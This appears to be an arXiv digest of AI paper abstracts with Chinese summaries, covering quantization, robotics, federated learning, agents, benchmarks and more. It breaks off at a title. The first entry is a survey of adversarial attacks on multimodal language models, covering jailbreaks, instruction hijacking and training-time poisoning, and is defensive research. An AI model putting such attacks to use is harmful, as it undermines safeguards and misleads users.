【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在面对对抗性攻击时表现出的新型和放大后的脆弱性问题。其解决方案的关键在于提出一个系统性的分类框架,从攻击者目标出发对攻击进行归类,并通过以漏洞为中心的分析方法,揭示完整性攻击、安全与越狱失败、控制与指令劫持以及训练阶段投毒等不同攻击类型所共有的架构和表征层面的弱点,从而为理解MLLMs中的对抗行为提供解释基础,并指导更鲁棒、更安全的多模态语言系统的设计与开发。
链接: https://arxiv.org/abs/2603.27918
作者: Bhavuk Jain,Sercan Ö. Arık,Hardeo K. Thakur
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注: Survey paper, 37 pages, 10 figures, accepted at TMLR
Abstract:Multimodal large language models (MLLMs) integrate information from multiple modalities such as text, images, audio, and video, enabling complex capabilities such as visual question answering and audio translation. While powerful, this increased expressiveness introduces new and amplified vulnerabilities to adversarial manipulation. This survey provides a comprehensive and systematic analysis of adversarial threats to MLLMs, moving beyond enumerating attack techniques to explain the underlying causes of model susceptibility. We introduce a taxonomy that organizes adversarial attacks according to attacker objectives, unifying diverse attack surfaces across modalities and deployment settings. Additionally, we also present a vulnerability-centric analysis that links integrity attacks, safety and jailbreak failures, control and instruction hijacking, and training-time poisoning to shared architectural and representational weaknesses in multimodal systems. Together, this framework provides an explanatory foundation for understanding adversarial behavior in MLLMs and informs the development of more robust and secure multimodal language systems.
[AI-63] ITQ3_S: High-Fidelity 3-bit LLM Inference via Interleaved Ternary Quantization with Rotation-Domain Smoothing
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在3比特权重量化(Weight Quantization)过程中因权重分布的重尾特性与通道间异常值导致的灾难性精度损失问题。传统3-bit量化方法难以有效处理此类非均匀分布,从而显著降低模型性能。其解决方案的关键在于提出一种名为ITQ3_S(Interleaved Ternary Quantization – Specialized)的新量化格式,该方法引入TurboQuant(TQ)策略——基于快速沃尔什-哈达玛变换(Fast Walsh-Hadamard Transform, FWHT)的旋转域自适应量化机制,在量化前对权重空间进行预旋转,将异常值能量均匀分散至整个向量,诱导出近似高斯分布,从而更适配统一的三元量化编码。进一步地,作者设计了一种数学上严格可逆的反量化流程,利用256点逆沃尔什-哈达玛变换(Inverse Walsh-Hadamard Transform)融合到CUDA共享内存加载阶段,实现离线量化与在线推理间的零误差往返保真度(zero-error round-trip fidelity)。理论证明表明,对于任意长度为256的权重向量,重构误差满足∥w^−w∥2≤ϵq,且ϵq仅由三元量化网格决定,并严格优于同等比特预算下的所有均匀3-bit基线方案。
链接: https://arxiv.org/abs/2603.27914
作者: Edward J. Yoon
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC)
备注: 12 pages, 4 figures, 3 tables
Abstract:We present \textbfITQ3_S (Interleaved Ternary Quantization – Specialized), a novel 3-bit weight quantization format for large language models (LLMs) that integrates \textbfTurboQuant (TQ), a rotation-domain adaptive quantization strategy based on the Fast Walsh-Hadamard Transform (FWHT). Conventional 3-bit quantization methods suffer from catastrophic precision loss caused by heavy-tailed weight distributions and inter-channel outliers. ITQ3_S addresses this fundamental limitation by pre-rotating the weight space via FWHT prior to quantization, effectively spreading outlier energy across the entire vector and inducing a near-Gaussian distribution amenable to uniform ternary coding. Critically, we derive a mathematically rigorous dequantization procedure that inverts the FWHT exactly using a 256-point Inverse Walsh-Hadamard Transform fused into the CUDA shared-memory loading stage, ensuring zero-error round-trip fidelity between offline quantization and online inference. We prove that for any weight vector \mathbfw \in \mathbbR^256 processed by our pipeline, the reconstruction satisfies |\hat\mathbfw - \mathbfw|_2 \leq \epsilon_q , where \epsilon_q is determined solely by the ternary quantization grid and is strictly smaller than any uniform 3-bit baseline under equal bit-budget constraints. Empirically, on the NVIDIA RTX 5090 (Blackwell architecture), ITQ3_S achieves perplexity competitive with FP16 baselines while delivering throughput exceeding 1.5 \times that of 4-bit alternatives, owing to optimized DP4A and Tensor Core scheduling in the interleaved memory layout. Our results establish ITQ3_S as a practical, mathematically grounded solution for high-fidelity LLM deployment on consumer-grade hardware. Comments: 12 pages, 4 figures, 3 tables Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC) MSC classes: 68T50, 65T50, 94A29 ACMclasses: I.2.7; C.1.4; B.3.2 Cite as: arXiv:2603.27914 [cs.LG] (or arXiv:2603.27914v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27914 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-64] Kernel Dynamics under Path Entropy Maximization
【速读】:该论文试图解决的问题是:如何从信息热力学和变分原理的角度,理解并建模表示结构(即核函数)在动态演化过程中的自洽性与稳定性,从而揭示复杂系统中区分能力(distinction structure)的形成机制。其解决方案的关键在于提出一个基于路径熵最大化(Maximum Caliber, MaxCal)的变分框架,将核函数 $ k : X \times X \rightarrow \mathbb{R} $ 视为可动态演化的变量,而非固定参数;在此框架下,核空间中的轨迹对应于有效信息几何的演化路径,且优化景观内生于其自身遍历过程。通过建立自洽核的不动点条件、引入重整化群(Renormalization Group, RG)流作为结构化特例,并将深度网络训练中的神经切向核(Neural Tangent Kernel, NTK)演化视为实证候选实例,作者进一步指出:核变化所需的最小功由 $ \Delta W = k_B T \Delta I_k $ 给出,其中 $ \Delta I_k $ 是新解锁的互信息量,从而将表示结构的稳定性与热力学成本联系起来。
链接: https://arxiv.org/abs/2603.27880
作者: Jnaneshwar Das
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Robotics (cs.RO); Dynamical Systems (math.DS)
备注: 7 pages, 2 figures
Abstract:We propose a variational framework in which the kernel function k : X x X - R, interpreted as the foundational object encoding what distinctions an agent can represent, is treated as a dynamical variable subject to path entropy maximization (Maximum Caliber, MaxCal). Each kernel defines a representational structure over which an information geometry on probability space may be analyzed; a trajectory through kernel space therefore corresponds to a trajectory through a family of effective geometries, making the optimization landscape endogenous to its own traversal. We formulate fixed-point conditions for self-consistent kernels, propose renormalization group (RG) flow as a structured special case, and suggest neural tangent kernel (NTK) evolution during deep network training as a candidate empirical instantiation. Under explicit information-thermodynamic assumptions, the work required for kernel change is bounded below by delta W = k_B T delta I_k, where delta I_k is the mutual information newly unlocked by the updated kernel. In this view, stable fixed points of MaxCal over kernels correspond to self-reinforcing distinction structures, with biological niches, scientific paradigms, and craft mastery offered as conjectural interpretations. We situate the framework relative to assembly theory and the MaxCal literature, separate formal results from structured correspondences and conjectural bridges, and pose six open questions that make the program empirically and mathematically testable.
[AI-65] CARGO: Carbon-Aware Gossip Orchestration in Smart Shipping
【速读】:该论文旨在解决海上智能航运中分布式人工智能(Distributed AI)部署面临的挑战,即在船舶间连接不稳定、回传带宽有限且数据具有商业敏感性的环境下,如何实现高效、可靠且低碳的联邦学习(Federated Learning, FL)系统。现有基于服务器协调的FL方法难以适应海上网络的动态性与不可靠性,而现有去中心化方法又未将通信资源与碳排放、可靠性及长期参与均衡等关键因素协同管理。解决方案的关键在于提出CARGO框架——一种面向碳感知的去中心化通信调度机制,其将学习过程分为控制平面与数据平面:数据平面通过压缩式gossip通信执行本地优化,控制平面则动态决策每轮参与船舶、激活通信链路、更新压缩强度及触发恢复策略,从而在保障高精度的同时显著降低碳足迹和通信开销。
链接: https://arxiv.org/abs/2603.27857
作者: Alexandros S. Kalafatelis,Nikolaos Nomikos,Vasileios Nikolakakis,Nikolaos Tsoulakos,Panagiotis Trakadas
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Smart shipping operations increasingly depend on collaborative AI, yet the underlying data are generated across vessels with uneven connectivity, limited backhaul, and clear commercial sensitivity. In such settings, server-coordinated FL remains a weak systems assumption, depending on a reachable aggregation point and repeated wide-area synchronization, both of which are difficult to guarantee in maritime networks. A serverless gossip approach therefore represents a more natural approach, but existing methods still treat communication mainly as an optimization bottleneck, rather than as a resource that must be managed jointly with carbon cost, reliability, and long-term participation balance. In this context, this paper presents CARGO, a carbon-aware gossip orchestration framework for smart-shipping. CARGO separates learning into a control and a data plane. The data plane performs local optimization with compressed gossip exchange, while the control plane decides, at each round, which vessels should participate, which communication edges should be activated, how aggressively updates should be compressed, and when recovery actions should be triggered. We evaluate CARGO under a predictive-maintenance scenario using operational bulk-carrier engine data and a trace-driven maritime communication protocol that captures client dropout, partial participation, packet loss, and multiple connectivity regimes, derived from mobility-aware vessel interactions. Across the tested stress settings, CARGO consistently remains in the high-accuracy regime while reducing carbon footprint and communication overheads, compared to accuracy-competitive decentralized baselines. Overall, the conducted performance evaluation demonstrates that CARGO is a feasible and practical solution for reliable and resource-conscious maritime AI deployment.
[AI-66] What-If Explanations Over Time: Counterfactuals for Time Series Classification
【速读】:该论文旨在解决时间序列分类任务中可解释性不足的问题,特别是如何生成有效的反事实解释(counterfactual explanations),即通过最小的输入变化来改变模型预测结果,从而增强模型决策的透明性和可信度。其解决方案的关键在于系统梳理并比较当前主流的反事实生成方法,包括基于实例的最近邻技术、模式驱动算法、基于梯度的优化方法以及生成式模型,并深入分析它们在有效性(validity)、接近性(proximity)、稀疏性(sparsity)和合理性(plausibility)等维度上的表现差异。此外,作者开发了一个开源实现库 CFTS,用于标准化评估流程并促进实际应用,为未来研究指明了方向,如用户中心设计、领域知识融合及时间序列预测中的反事实生成。
链接: https://arxiv.org/abs/2603.27792
作者: Udo Schlegel,Thomas Seidl
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 24 pages, 1 figure, 3 tables, accepted at the XAI 2026
Abstract:Counterfactual explanations emerge as a powerful approach in explainable AI, providing what-if scenarios that reveal how minimal changes to an input time series can alter the model’s prediction. This work presents a survey of recent algorithms for counterfactual explanations for time series classification. We review state-of-the-art methods, spanning instance-based nearest-neighbor techniques, pattern-driven algorithms, gradient-based optimization, and generative models. For each, we discuss the underlying methodology, the models and classifiers they target, and the datasets on which they are evaluated. We highlight unique challenges in generating counterfactuals for temporal data, such as maintaining temporal coherence, plausibility, and actionable interpretability, which distinguish the temporal from tabular or image domains. We analyze the strengths and limitations of existing approaches and compare their effectiveness along key dimensions (validity, proximity, sparsity, plausibility, etc.). In addition, we implemented an open-source implementation library, Counterfactual Explanations for Time Series (CFTS), as a reference framework that includes many algorithms and evaluation metrics. We discuss this library’s contributions in standardizing evaluation and enabling practical adoption of explainable time series techniques. Finally, based on the literature and identified gaps, we propose future research directions, including improved user-centered design, integration of domain knowledge, and counterfactuals for time series forecasting.
[AI-67] Let the Agent Steer: Closed-Loop Ranking Optimization via Influence Exchange
【速读】:该论文旨在解决推荐排序中因离线代理指标与线上业务效果之间存在系统性偏差而导致的优化失效问题,尤其是现有方法无法通过单一校准因子纠正不同指标间的非对称偏差。其核心解决方案是提出 Sortify——首个完全自主的大型生产级推荐系统排序优化智能体,关键在于三方面创新:(1)基于 Savage 主观期望效用理论构建双通道框架,分离离线-线上迁移修正(信念通道)与约束惩罚调整(偏好通道);(2)引入大语言模型(LLM)元控制器,作用于框架级参数而非底层搜索变量,提升决策抽象层级;(3)设计包含7个关系表的持久化记忆数据库,实现跨轮次学习。该方案以“影响份额”为核心指标,确保各因素贡献总和恒为100%,从而实现从诊断到参数部署的闭环自动化优化。
链接: https://arxiv.org/abs/2603.27765
作者: Yin Cheng,Liao Zhou,Xiyu Liang,Dihao Luo,Tewei Lee,Kailun Zheng,Weiwei Zhang,Mingchen Cai,Jian Dong,Andy Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Recommendation ranking is fundamentally an influence allocation problem: a sorting formula distributes ranking influence among competing factors, and the business outcome depends on finding the optimal “exchange rates” among them. However, offline proxy metrics systematically misjudge how influence reallocation translates to online impact, with asymmetric bias across metrics that a single calibration factor cannot correct. We present Sortify, the first fully autonomous LLM-driven ranking optimization agent deployed in a large-scale production recommendation system. The agent reframes ranking optimization as continuous influence exchange, closing the full loop from diagnosis to parameter deployment without human intervention. It addresses structural problems through three mechanisms: (1) a dual-channel framework grounded in Savage’s Subjective Expected Utility (SEU) that decouples offline-online transfer correction (Belief channel) from constraint penalty adjustment (Preference channel); (2) an LLM meta-controller operating on framework-level parameters rather than low-level search variables; (3) a persistent Memory DB with 7 relational tables for cross-round learning. Its core metric, Influence Share, provides a decomposable measure where all factor contributions sum to exactly 100%. Sortify has been deployed across two Southeast Asian markets. In Country A, the agent pushed GMV from -3.6% to +9.2% within 7 rounds with peak orders reaching +12.5%. In Country B, a cold-start deployment achieved +4.15% GMV/UU and +3.58% Ads Revenue in a 7-day A/B test, leading to full production rollout. Subjects: Artificial Intelligence (cs.AI) Cite as: arXiv:2603.27765 [cs.AI] (or arXiv:2603.27765v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27765 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-68] Heracles: Bridging Precise Tracking and Generative Synthesis for General Humanoid Control
【速读】:该论文旨在解决当前通用人形机器人控制中运动追踪与环境扰动适应性之间的矛盾问题:现有控制器多采用刚性的参考轨迹跟踪策略,在理想条件下有效,但在遭遇严重扰动时易出现非人类化的脆弱失效模式,缺乏类人运动控制所具备的生成式适应能力。解决方案的关键在于提出 Heracles——一种状态条件扩散中间件(state-conditioned diffusion middleware),其作为高层参考运动与底层物理追踪器之间的中介层,通过实时状态条件隐式调整行为:当状态与参考高度一致时近似身份映射以保持零样本跟踪保真度;当状态偏离显著时则自动切换为生成合成器,生成自然且类人的恢复轨迹。该框架将生成先验引入控制回路,不仅大幅提升了对极端扰动的鲁棒性,更实现了从刚性追踪范式到开放式的生成式通用架构的跃迁。
链接: https://arxiv.org/abs/2603.27756
作者: Zelin Tao,Zeran Su,Peiran Liu,Jingkai Sun,Wenqiang Que,Jiahao Ma,Jialin Yu,Jiahang Cao,Pihai Sun,Hao Liang,Gang Han,Wen Zhao,Zhiyuan Xu,Yijie Guo,Jian Tang,Qiang Zhang
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 26 pages, 7 figures, 6 tables
Abstract:Achieving general-purpose humanoid control requires a delicate balance between the precise execution of commanded motions and the flexible, anthropomorphic adaptability needed to recover from unpredictable environmental perturbations. Current general controllers predominantly formulate motion control as a rigid reference-tracking problem. While effective in nominal conditions, these trackers often exhibit brittle, non-anthropomorphic failure modes under severe disturbances, lacking the generative adaptability inherent to human motor control. To overcome this limitation, we propose Heracles, a novel state-conditioned diffusion middleware that bridges precise motion tracking and generative synthesis. Rather than relying on rigid tracking paradigms or complex explicit mode-switching, Heracles operates as an intermediary layer between high-level reference motions and low-level physics trackers. By conditioning on the robot’s real-time state, the diffusion model implicitly adapts its behavior: it approximates an identity map when the state closely aligns with the reference, preserving zero-shot tracking fidelity. Conversely, when encountering significant state deviations, it seamlessly transitions into a generative synthesizer to produce natural, anthropomorphic recovery trajectories. Our framework demonstrates that integrating generative priors into the control loop not only significantly enhances robustness against extreme perturbations but also elevates humanoid control from a rigid tracking paradigm to an open-ended, generative general-purpose architecture.
[AI-69] SkyNet: Belief-Aware Planning for Partially-Observable Stochastic Games
【速读】:该论文旨在解决MuZero在部分可观测、随机性多智能体环境中的性能局限问题,这类环境要求智能体在对隐藏状态不确定的情况下进行决策,例如扑克类游戏、自主谈判和金融交易等场景。传统MuZero依赖隐式状态编码,缺乏专门机制来表征未观测变量的不确定性,导致其在部分可观测环境中表现不佳。解决方案的关键在于提出SkyNet(Belief-Aware MuZero),通过在标准MuZero架构中引入以自我条件(ego-conditioned)的辅助头(auxiliary heads),分别用于胜者预测和排名估计,从而引导隐状态保留对结果具有预测性的信息,而无需显式构建信念状态(belief state)或修改搜索算法。实验表明,该方法在Skyjo卡牌游戏中显著优于基线模型,尤其是在训练数据充足时展现出决定性优势,验证了信念感知辅助监督可有效提升部分可观测环境下策略学习的表征质量。
链接: https://arxiv.org/abs/2603.27751
作者: Adam Haile
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:In 2019, Google DeepMind released MuZero, a model-based reinforcement learning method that achieves strong results in perfect-information games by combining learned dynamics models with Monte Carlo Tree Search (MCTS). However, comparatively little work has extended MuZero to partially observable, stochastic, multi-player environments, where agents must act under uncertainty about hidden state. Such settings arise not only in card games but in domains such as autonomous negotiation, financial trading, and multi-agent robotics. In the absence of explicit belief modeling, MuZero’s latent encoding has no dedicated mechanism for representing uncertainty over unobserved variables. To address this, we introduce SkyNet (Belief-Aware MuZero), which adds ego-conditioned auxiliary heads for winner prediction and rank estimation to the standard MuZero architecture. These objectives encourage the latent state to retain information predictive of outcomes under partial observability, without requiring explicit belief-state tracking or changes to the search algorithm. We evaluate SkyNet on Skyjo, a partially observable, non-zero-sum, stochastic card game, using a decision-granularity environment, transformer-based encoding, and a curriculum of heuristic opponents with self-play. In 1000-game head-to-head evaluations at matched checkpoints, SkyNet achieves a 75.3% peak win rate against the baseline (+194 Elo, p 10^-50 ). SkyNet also outperforms the baseline against heuristic opponents (0.720 vs.\ 0.466 win rate). Critically, the belief-aware model initially underperforms the baseline but decisively surpasses it once training throughput is sufficient, suggesting that belief-aware auxiliary supervision improves learned representations under partial observability, but only given adequate data flow. Subjects: Artificial Intelligence (cs.AI) Cite as: arXiv:2603.27751 [cs.AI] (or arXiv:2603.27751v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27751 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-70] Needle in the Repo: A Benchmark for Maintainability in AI-Generated Repository Edits
【速读】:该论文旨在解决当前生成式 AI (Generative AI) 编码代理在代码生成评估中过度关注行为正确性而忽视可维护性风险的问题,例如模块化不足或测试性差等。其核心解决方案是提出 Needle in the Repo (NITR) 框架,该框架通过在小型、真实的多文件代码库中嵌入受控探针(probes),将软件工程中的常见原则转化为可量化、可诊断的维护维度;每个探针均配备一个隐藏的评估夹具(harness),结合功能测试与结构断言(structural oracles)来同时验证行为正确性和结构合理性,并提供可解释的诊断结果。这一设计使 NITR 能够精准识别出仅通过功能测试但违反维护约束的“伪正确”案例,从而揭示传统评估未覆盖的关键失败面。
链接: https://arxiv.org/abs/2603.27745
作者: Haichao Zhu,Qian Zhang,Jiyuan Wang,Zhaorui Yang,Yuxin Qiu
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: 16 pages, 6 figures
Abstract:AI coding agents can now complete complex programming tasks, but existing evaluations largely emphasize behavioral correctness and often overlook maintainability risks such as weak modularity or testability. We present Needle in the Repo (NITR), a diagnostic probe-and-oracle framework for evaluating whether behaviorally correct repository edits preserve maintainable structure. NITR distills recurring software engineering wisdom into controlled probes embedded in small, realistic multi-file codebases, each designed so that success depends primarily on one targeted maintainability dimension. Each probe is paired with a hidden evaluation harness that combines functional tests for required behavior with structural oracles that encode the targeted maintainability constraint and return interpretable diagnoses. Using NITR, we evaluate 23 coding configurations across GPT, Claude, Gemini, and Qwen families in both direct-inference and agent-based settings. Current AI coding systems remain far from robust: on average, configurations solve only 36.2% of cases, the best reaches 57.1%, and performance drops from 53.5% on micro cases to 20.6% on multi-step cases. The hardest pressures are architectural rather than local edits, especially dependency control (4.3%) and responsibility decomposition (15.2%). Moreover, 64/483 outcomes (13.3%) pass all functional tests yet fail the structural oracle. Under our harness, agent-mode configurations improve average performance from 28.2% to 45.0%, but do not eliminate these architectural failures. These results show that progress in code generation is not yet progress in maintainable code evolution, and that NITR exposes a critical failure surface missed by conventional evaluation. Comments: 16 pages, 6 figures Subjects: Software Engineering (cs.SE); Artificial Intelligence (cs.AI) Cite as: arXiv:2603.27745 [cs.SE] (or arXiv:2603.27745v1 [cs.SE] for this version) https://doi.org/10.48550/arXiv.2603.27745 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-71] anJi:An autonomous AI meteorologist for discovering physical mechanisms in atmospheric science
【速读】:该论文旨在解决地球系统科学中物理机制研究效率低下的问题,即当前生成式 AI 在天气预报等任务中虽表现出色,但本质上仍为统计拟合,难以揭示大气系统的物理因果机制;而传统依赖领域知识和人工工程操作的研究方式则成为制约高效探索的瓶颈。解决方案的关键在于提出首个可自主驱动复杂数值模型验证物理机制的“AI气象学家”系统——TianJi,其核心创新是基于大语言模型驱动的多智能体架构,将科研过程解耦为认知规划与工程执行两个阶段:元规划器负责解析科学假说并制定实验路线图,一组专业化工作代理协同完成数据准备、模型配置及多维结果分析,从而实现从假设生成到验证判断的全流程自动化,显著缩短研究周期并提升可解释性,推动AI从“黑箱预测者”向“可解释科学协作者”转变。
链接: https://arxiv.org/abs/2603.27738
作者: Kaikai Zhang,Xiang Wang,Haoluo Zhao,Nan Chen,Mengyang Yu Jing-Jia Luo,Tao Song,Fan Meng
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Artificial intelligence (AI) has achieved breakthroughs comparable to traditional numerical models in data-driven weather forecasting, yet it remains essentially statistical fitting and struggles to uncover the physical causal mechanisms of the atmosphere. Physics-oriented mechanism research still heavily relies on domain knowledge and cumbersome engineering operations of human scientists, becoming a bottleneck restricting the efficiency of Earth system science exploration. Here, we propose TianJi - the first “AI meteorologist” system capable of autonomously driving complex numerical models to verify physical mechanisms. Powered by a large language model-driven multi-agent architecture, TianJi can autonomously conduct literature research and generate scientific hypotheses. We further decouple scientific research into cognitive planning and engineering execution: the meta-planner interprets hypotheses and devises experimental roadmaps, while a cohort of specialized worker agents collaboratively complete data preparation, model configuration, and multi-dimensional result analysis. In two classic atmospheric dynamic scenarios (squall-line cold pools and typhoon track deflections), TianJi accomplishes expert-level end-to-end experimental operations with zero human intervention, compressing the research cycle to a few hours. It also delivers detailed result analyses and autonomously judges and explains the validity of the hypotheses from outputs. TianJi reveals that the role of AI in Earth system science is transitioning from a “black-box predictor” to an “interpretable scientific collaborator”, offering a new paradigm for high-throughput exploration of scientific mechanisms.
[AI-72] Robust Smart Contract Vulnerability Detection via Contrastive Learning-Enhanced Granular-ball Training
【速读】:该论文旨在解决智能合约漏洞检测中因标签噪声(label noise)导致的模型准确性与鲁棒性下降的问题。当前深度神经网络(Deep Neural Networks, DNNs)依赖大规模标注数据进行训练,而实际标注常依赖开源工具,其准确性难以保证,从而引入标签噪声,影响检测效果。解决方案的关键在于提出一种增强型训练框架——对比学习增强的粒度球智能合约训练方法(Contrastive learning-enhanced Granular-Ball smart Contracts training, CGBC),其核心包括:1)在编码器与分类器之间引入粒度球(Granular-Ball, GB)计算层,通过聚类生成粗粒度表示并基于一致性校正噪声标签;2)结合跨GB紧凑性损失与GB内松散性损失优化聚类质量;3)利用新型语义一致的智能合约增强策略进行无监督对比预训练,提升特征区分能力;4)采用对称交叉熵损失函数缓解标签噪声对梯度更新的影响,从而显著提升模型在噪声环境下的鲁棒性和检测有效性。
链接: https://arxiv.org/abs/2603.27734
作者: Zeli Wang,Qingxuan Yang,Shuyin Xia,Yueming Wu,Bo Liu,Longlong Lin
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep neural networks (DNNs) have emerged as a prominent approach for detecting smart contract vulnerabilities, driven by the growing contract datasets and advanced deep learning techniques. However, DNNs typically require large-scale labeled datasets to model the relationships between contract features and vulnerability labels. In practice, the labeling process often depends on existing open-sourced tools, whose accuracy cannot be guaranteed. Consequently, label noise poses a significant challenge for the accuracy and robustness of the smart contract, which is rarely explored in the literature. To this end, we propose Contrastive learning-enhanced Granular-Ball smart Contracts training, CGBC, to enhance the robustness of contract vulnerability detection. Specifically, CGBC first introduces a Granular-ball computing layer between the encoder layer and the classifier layer, to group similar contracts into Granular-Balls (GBs) and generate new coarse-grained representations (i.e., the center and the label of GBs) for them, which can correct noisy labels based on the most correct samples. An inter-GB compactness loss and an intra-GB looseness loss are combined to enhance the effectiveness of clustering. Then, to improve the accuracy of GBs, we pretrain the model through unsupervised contrastive learning supported by our novel semantic-consistent smart contract augmentation method. This procedure can discriminate contracts with different labels by dragging the representation of similar contracts closer, assisting CGBC in clustering. Subsequently, we leverage the symmetric cross-entropy loss function to measure the model quality, which can combat the label noise in gradient computations. Finally, extensive experiments show that the proposed CGBC can significantly improve the robustness and effectiveness of the smart contract vulnerability detection when contrasted with baselines.
[AI-73] he role of neuromorphic principles in the future of biomedicine and healthcare
【速读】:该论文旨在解决当前神经形态工程(neuromorphic engineering)在生物医学与健康领域应用中的发展瓶颈问题,明确其在转化研究、跨学科协作及产业化路径上的关键挑战。解决方案的关键在于通过多学科协同推进,汇聚早期和资深学者、工程师、临床专家、产业界及资助方等多方力量,在Neuromorphic Principles in Biomedicine and Healthcare (NPBH) 工作坊中系统梳理领域现状、识别共性障碍,并制定面向未来的研发战略,以加速神经形态技术向生物医学工程和神经技术的实际落地转化。
链接: https://arxiv.org/abs/2603.27716
作者: Grace M. Hwang,Jessica D. Falcone,Joseph D. Monaco,Courtney R. Pinard,Jessica A. Mollick,Roger L. Miller,Stephanie L. Gage,Andrey V. Kanaev,Margaret Kim,R. Ale Lukaszew,Steven M. Zehnder,David Rampulla
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: 56 pages; 1 figure
Abstract:Neuromorphic engineering has matured over the past four decades and is currently experiencing explosive growth with the potential to transform biomedical engineering and neurotechnologies. Participants at the Neuromorphic Principles in Biomedicine and Healthcare (NPBH) Workshop (October 2024) – representing a broad cross-section of the community, including early-career and established scholars, engineers, scientists, clinicians, industry, and funders – convened to discuss the state of the field, current and future challenges, and strategies for advancing neuromorphic research and development for biomedical applications. Publicly approved recordings with transcripts (this https URL) and slides (this https URL) can be found at the workshop website.
[AI-74] ProgressVLA: Progress-Guided Diffusion Policy for Vision-Language Robotic Manipulation
【速读】:该论文旨在解决现有视觉-语言-动作(Vision-Language-Action, VLA)模型在机器人操作任务中缺乏进展感知(progress awareness)的问题,尤其在涉及多级子目标的长时程任务中,传统方法依赖手工设计的启发式策略进行任务终止,导致泛化能力差、成功率低。解决方案的关键在于提出一种名为 \textbf{\vla} 的新模型,其核心技术贡献为:(1)鲁棒的进展估计——基于大规模无监督视频-文本机器人数据预训练进展估计算法,在仿真中实现低预测残差(0.07,量纲[0,1]),并具备零样本迁移至未见真实场景的能力;(2)可微分的进展引导机制——引入逆动力学世界模型,将预测的动作标记映射到未来潜在视觉状态,并通过进展估计算法对这些潜在状态进行处理,结合最大进展正则化构建可微分管道,从而实现以进展为导向的策略优化,显著提升动作标记的精度与任务成功率。
链接: https://arxiv.org/abs/2603.27670
作者: Hongyu Yan,Qiwei Li,Jiaolong Yang,Yadong Mu
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Most existing vision-language-action (VLA) models for robotic manipulation lack progress awareness, typically relying on hand-crafted heuristics for task termination. This limitation is particularly severe in long-horizon tasks involving cascaded sub-goals. In this work, we investigate the estimation and integration of task progress, proposing a novel model named \textbf \vla. Our technical contributions are twofold: (1) \emphrobust progress estimation: We pre-train a progress estimator on large-scale, unsupervised video-text robotic datasets. This estimator achieves a low prediction residual (0.07 on a scale of [0, 1] ) in simulation and demonstrates zero-shot generalization to unseen real-world samples, and (2) \emphdifferentiable progress guidance: We introduce an inverse dynamics world model that maps predicted action tokens into future latent visual states. These latents are then processed by the progress estimator; by applying a maximal progress regularization, we establish a differentiable pipeline that provides progress-piloted guidance to refine action tokens. Extensive experiments on the CALVIN and LIBERO benchmarks, alongside real-world robot deployment, consistently demonstrate substantial improvements in success rates and generalization over strong baselines.
[AI-75] EvA: An Evidence-First Audio Understanding Paradigm for LALMs
【速读】:该论文旨在解决大型音频语言模型(Large Audio Language Models, LALMs)在复杂声学场景中表现不佳的问题,其核心瓶颈在于任务相关的声学证据在推理前被丢失,即所谓的“证据瓶颈”(evidence bottleneck)。研究表明,当前先进系统在声学特征提取上的缺陷远大于下游推理能力的不足,说明问题主要出在上游感知阶段。为此,作者提出 EvA(Evidence-First Audio)架构,其关键创新在于采用双路径设计:首先通过非压缩、时间对齐的融合方式将 CED-Base 模型的中间层特征聚合以保留多尺度声学线索,随后将这些特征与 Whisper 的时序对齐并拼接,不改变序列长度。该方法强调在推理前优先保留和整合原始声学证据,从而显著提升音频理解性能,实验证明其在多个感知密集型任务上优于现有模型。
链接: https://arxiv.org/abs/2603.27667
作者: Xinyuan Xie,Shunian Chen,Zhiheng Liu,Yuhao Zhang,Zhiqiang Lv,Liyin Liang,Benyou Wang
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI)
备注:
Abstract:Large Audio Language Models (LALMs) still struggle in complex acoustic scenes because they often fail to preserve task-relevant acoustic evidence before reasoning begins. We call this failure the evidence bottleneck: state-of-the-art systems show larger deficits in evidence extraction than in downstream reasoning, suggesting that the main limitation lies in upstream perception rather than reasoning policy. To address this problem, we propose EvA (Evidence-First Audio), a dual-path architecture that combines Whisper and CED-Base through non-compressive, time-aligned fusion. EvA first aggregates intermediate CED layers to preserve multi-scale acoustic cues, then aligns the aggregated CED features to the Whisper timeline and adds the two streams without changing sequence length. We also build EvA-Perception, a large-scale open-source training set with about 54K event-ordered captions (150 h) and about 500K QA pairs. Under a unified zero-shot protocol, EvA achieves the best open-source Perception scores on MMAU, MMAR, and MMSU, and improves over Kimi-Audio-7B on all reported metrics, with the largest gains on perception-heavy splits. These results support the evidence-first hypothesis: stronger audio understanding depends on preserving acoustic evidence before reasoning.
[AI-76] DSevolve: Enabling Real-Time Adaptive Scheduling on Dynamic Shop Floor with LLM -Evolved Heuristic Portfolios
